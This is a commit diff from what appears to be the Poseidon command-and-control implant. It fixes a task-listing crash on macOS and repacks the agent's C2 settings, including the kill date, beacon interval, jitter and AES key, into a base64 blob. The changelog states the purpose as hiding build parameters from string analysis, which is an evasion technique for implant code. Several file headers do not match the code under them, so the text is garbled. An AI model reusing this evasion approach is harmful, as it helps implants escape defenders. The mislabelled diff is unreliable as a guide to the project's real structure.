fixed listtasks bug and updated build process

updated build process to help hide build parameters from strings

Author: its-a-feature

Payload_Type/poseidon/poseidon/agent_code/CHANGELOG.MD

@@ -4,6 +4,13 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
 and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
 
+## 2.0.28 - 2024-03-13
+
+### Changed
+
+- Fixed an issue with `listtasks` causes a segfault when not root
+- Updated the build process to take in base64 encoded values to help reduce easily visible data from build
+
 ## 2.0.27 - 2024-03-08
 
 ### Changed

Payload_Type/poseidon/poseidon/agent_code/Makefile

@@ -1,3 +1,4 @@
+//go:build darwin
 // +build darwin
 
 package listtasks

Payload_Type/poseidon/poseidon/agent_code/dynamichttp_test_agent_config.json

@@ -15,17 +15,26 @@
         kern_return_t kr;
         host_get_host_priv_port(mach_host_self(), &host_priv);
         kr = processor_set_default(host_priv, &psDefault);
+        if (kr != KERN_SUCCESS) {
+            return [[NSString stringWithFormat:@"{\"error\": \"%x\"}", kr] UTF8String];
+        }
         processor_set_name_array_t    *psets = malloc(1024);
         mach_msg_type_number_t      psetCount;
         kr = host_processor_sets(host_priv, psets, &psetCount);
+        if (kr != KERN_SUCCESS) {
+            return [[NSString stringWithFormat:@"{\"error\": \"%x\"}", kr] UTF8String];
+        }
         kr = host_processor_set_priv(host_priv, psDefault, &psDefault_control);
 
         if (kr != KERN_SUCCESS) {
-            return [NSString stringWithFormat:@"%x", kr];
+            return [[NSString stringWithFormat:@"{\"error\": \"%x\"}", kr] UTF8String];
         }
 
         numTasks=1000;
         kr = processor_set_tasks(psDefault_control, &tasks, &numTasks);
+        if (kr != KERN_SUCCESS) {
+            return [[NSString stringWithFormat:@"{\"error\": \"%x\"}", kr] UTF8String];
+        }
         NSMutableDictionary *taskList = [@{} mutableCopy];
 
         for (i = 0; i < numTasks; i++) {

Payload_Type/poseidon/poseidon/agent_code/listtasks/listtasks_darwin.go

@@ -26,14 +26,17 @@ import (
 	"github.com/MythicAgents/poseidon/Payload_Type/poseidon/agent_code/pkg/utils/structs"
 )
 
-// All variables must be a string so they can be set with ldflags
-var dynamichttp_callback_jitter string
-var dynamichttp_callback_interval string
-var dynamichttp_killdate string
-var dynamichttp_encrypted_exchange_check string
-var dynamichttp_raw_c2_config string
-var dynamichttp_AESPSK string
+// base64 encoded version of the JSON initial configuration of dynamichttp
+var dynamichttp_initial_config string
 
+type DynamicHTTPInitialConfig struct {
+	Killdate               string                `json:"killdate"`
+	Interval               uint                  `json:"callback_interval"`
+	Jitter                 uint                  `json:"callback_jitter"`
+	EncryptedExchangeCheck bool                  `json:"encrypted_exchange_check"`
+	AESPSK                 string                `json:"AESPSK"`
+	RawC2Config            C2DynamicHTTPC2Config `json:"raw_c2_config"`
+}
 type C2DynamicHTTPFunction struct {
 	Function   string   `json:"function"`
 	Parameters []string `json:"parameters"`
@@ -78,44 +81,45 @@ type C2DynamicHTTP struct {
 
 // New creates a new DynamicHTTP C2 profile from the package's global variables and returns it
 func init() {
-	killDateString := fmt.Sprintf("%sT00:00:00.000Z", dynamichttp_killdate)
+	initialConfigBytes, err := base64.StdEncoding.DecodeString(dynamichttp_initial_config)
+	if err != nil {
+		utils.PrintDebug(fmt.Sprintf("error trying to decode initial dynamichttp config, exiting: %v\n", err))
+		os.Exit(1)
+	}
+	initialConfig := DynamicHTTPInitialConfig{}
+	err = json.Unmarshal(initialConfigBytes, &initialConfig)
+	if err != nil {
+		utils.PrintDebug(fmt.Sprintf("error trying to unmarshal initial dynamichttp config, exiting: %v\n", err))
+		os.Exit(1)
+	}
+	killDateString := fmt.Sprintf("%sT00:00:00.000Z", initialConfig.Killdate)
 	killDateTime, err := time.Parse("2006-01-02T15:04:05.000Z", killDateString)
 	if err != nil {
 		utils.PrintDebug("Kill date failed to parse. Exiting.")
 		os.Exit(1)
 	}
 	profile := C2DynamicHTTP{
-		Key:            dynamichttp_AESPSK,
+		Key:            initialConfig.AESPSK,
 		Killdate:       killDateTime,
 		ShouldStop:     true,
 		stoppedChannel: make(chan bool, 1),
 	}
 
 	// Convert sleep from string to integer
-	i, err := strconv.Atoi(dynamichttp_callback_interval)
-	if err == nil {
-		profile.Interval = i
-	} else {
-		profile.Interval = 10
+	profile.Interval = int(initialConfig.Interval)
+	if profile.Interval < 0 {
+		profile.Interval = 0
 	}
 
 	// Convert jitter from string to integer
-	j, err := strconv.Atoi(dynamichttp_callback_jitter)
-	if err == nil {
-		profile.Jitter = j
-	} else {
-		profile.Jitter = 23
+	profile.Jitter = int(initialConfig.Jitter)
+	if profile.Jitter < 0 {
+		profile.Jitter = 0
 	}
 
 	// Add Agent Configuration
-	//json.Unmarshal([]byte("[{\"name\": \"User-Agent\",\"key\": \"User-Agent\",\"value\": \"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\"}]"), &profile.HeaderList)
-	if err := json.Unmarshal([]byte(dynamichttp_raw_c2_config), &profile.Config); err != nil {
-		utils.PrintDebug(fmt.Sprintf("error trying to unmarshal agent configuration: %v\n", err))
-		os.Exit(1)
-	}
-	if dynamichttp_encrypted_exchange_check == "true" {
-		profile.ExchangingKeys = true
-	}
+	profile.Config = initialConfig.RawC2Config
+	profile.ExchangingKeys = initialConfig.EncryptedExchangeCheck
 	RegisterAvailableC2Profile(&profile)
 }